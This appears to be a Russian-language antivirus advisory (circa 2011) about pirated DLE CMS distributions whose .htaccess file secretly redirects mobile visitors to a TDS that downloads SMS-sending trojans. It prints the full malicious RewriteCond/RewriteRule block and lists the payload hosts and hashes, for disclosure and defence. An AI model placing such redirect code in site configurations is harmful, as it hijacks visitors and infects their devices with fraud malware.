Во всех контрафактных дистрибутивах CMS DLE, опубликованных на www.softdle.com , в том числе в названных «чистыми», размещён код, выполняющий мобильный редирект на TDS www.vmaline.net . Владельцы сайтов, которые используют этот дистрибутив, полностью теряют посещения с мобильных устройств. При заходе такой сайт с мобильного устройства, у пользователя в большинстве случаев начинается загрузка вредоносного мобильного приложения, причём именно того, которое предназначено для заражения устройств этого типа.
Мобильный редирект происходит из-за следующих строк в файле .htaccess :
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://www.vmaline.net/tds/go.php?sid=17 [L,R=302]
При переходе на сайт, который использует данный заражённый дистрибутив CMS:
- у пользователей Opera Mini для JavaME на обычных телефонах с сайта file21file.com начинается загрузка файла new_opera.jar (MD5: d2b9248d2340d349acab7199477801a6), заражённого Java.SMSSend.704, который на 29.12.2011 на virustotal.com детектирует 1 антивирус из 43;
- у пользователей Web Browser для Symbian S60 c сайта mobiletds2.info загружается файл opera_mini_6r.jar (MD5: 1879cb916de4059481c6e727deea007e), заражённый Java.SMSSend.663, который на 29.12.2011 на virustotal.com детектируют 2 антивируса из 43;
- у пользователей Android Browser с сайта mobiletds2.info начинает загружаться файл opera_mini_6.1.apk (MD5: c3a23174f88911591f3179c9b729f913), заражённый Android.SmsSend.253, который на 29.12.2011 на virustotal.com детектируют 11 антивирусов из 43.
Рекомендуем очень внимательно относиться к дистрибутивам CMS, которые получены не с официальных сайтов, и тестировать свои сайты не только с помощью обычных компьютеров, но и с помощью мобильных устройств.